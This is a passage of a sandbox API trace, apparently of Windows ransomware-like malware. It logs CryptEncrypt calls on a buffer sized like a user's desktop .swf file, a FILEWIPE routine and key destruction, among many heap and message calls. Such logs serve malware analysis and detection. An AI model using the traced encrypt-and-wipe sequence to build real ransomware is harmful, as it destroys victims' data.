lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.996] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0030.996] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0030.996] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.996] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0030.996] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.996] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0030.996] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.996] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0030.996] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0030.996] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0030.997] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0030.997] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0030.997] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.997] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.997] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.997] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.997] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0030.997] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.997] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.997] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.997] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0030.997] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0030.997] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.997] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0xc19f, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0xc1a0) returned 1 [0030.998] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.998] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.998] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0030.998] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.998] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.998] CharLowerBuffW (in: lpsz="byte[49569]", cchLength=0xb | out: lpsz="byte[49569]") returned 0xb [0030.998] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.999] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.999] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.999] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.999] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0030.999] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0030.999] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.999] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x8affc0*, pdwDataLen=0x6ae220*=0xc19f, dwBufLen=0xc1a0 | out: pbData=0x8affc0*, pdwDataLen=0x6ae220*=0xc1a0) returned 1 [0030.999] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.999] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.999] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0030.999] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.999] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.999] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.000] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.000] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0031.000] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0031.000] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0031.000] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.000] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0031.000] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.000] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0031.000] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0031.000] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0031.000] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0031.000] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0031.000] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.000] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0031.000] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.000] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0031.000] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0031.000] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.000] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0031.000] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.000] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0031.000] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0031.000] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.004] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.004] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.004] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0031.004] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.006] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.007] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.007] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0031.007] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.007] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0031.007] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0031.007] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.007] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.007] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0031.007] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0031.007] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.007] CryptDestroyKey (hKey=0x7c2200) returned 1 [0031.007] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0031.007] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0031.007] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0031.007] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c60 | out: hHeap=0x770000) returned 1 [0031.007] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0031.007] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0031.007] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0031.007] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.007] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0031.007] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0031.007] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0031.008] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0031.008] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0031.008] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0031.008] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0031.008] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.008] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0031.008] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0031.008] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0031.008] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0031.008] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0031.008] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0031.008] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0031.008] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0031.008] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0031.008] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.008] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0031.008] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0031.008] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0031.008] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.008] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0031.008] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.008] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0031.008] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0031.008] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0031.008] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0031.008] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0031.008] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.008] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0031.008] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.008] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0031.008] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0031.009] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.009] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.009] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.009] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0031.009] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0031.009] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0031.009] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0031.009] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0031.009] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0031.009] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.009] CryptReleaseContext (hProv=0x7d5b30, dwFlags=0x0) returned 1 [0031.009] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.009] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.009] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.009] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0031.009] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0031.009] FreeLibrary (hLibModule=0x754b0000) returned 1 [0031.009] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0031.009] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0031.009] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.009] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0031.009] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.009] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0031.009] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0031.009] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.010] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.011] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.011] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.011] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0031.011] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0031.011] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0031.011] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.011] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.011] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\5o5iPNmM_ES0x.swf", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x42ccfb10, ftCreationTime.dwHighDateTime=0x1d5bf26, ftLastAccessTime.dwLowDateTime=0xa6e56f60, ftLastAccessTime.dwHighDateTime=0x1d5ba03, ftLastWriteTime.dwLowDateTime=0xa6e56f60, ftLastWriteTime.dwHighDateTime=0x1d5ba03, nFileSizeHigh=0x0, nFileSizeLow=0xc19f, dwReserved0=0x0, dwReserved1=0x777648, cFileName="5o5iPNmM_ES0x.swf", cAlternateFileName="5O5IPN~1.SWF")) returned 0x7c2240 [0031.011] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0031.011] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0031.011] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0031.011] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0031.011] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0031.012] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.012] CharLowerBuffW (in: lpsz="byte[49567]", cchLength=0xb | out: lpsz="byte[49567]") returned 0xb [0031.012] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.012] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0031.012] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0031.012] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0031.012] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.013] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0031.013] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0031.013] FreeLibrary (hLibModule=0x76b40000) returned 1 [0031.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0031.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0031.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0031.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0031.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0031.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0031.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0031.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: 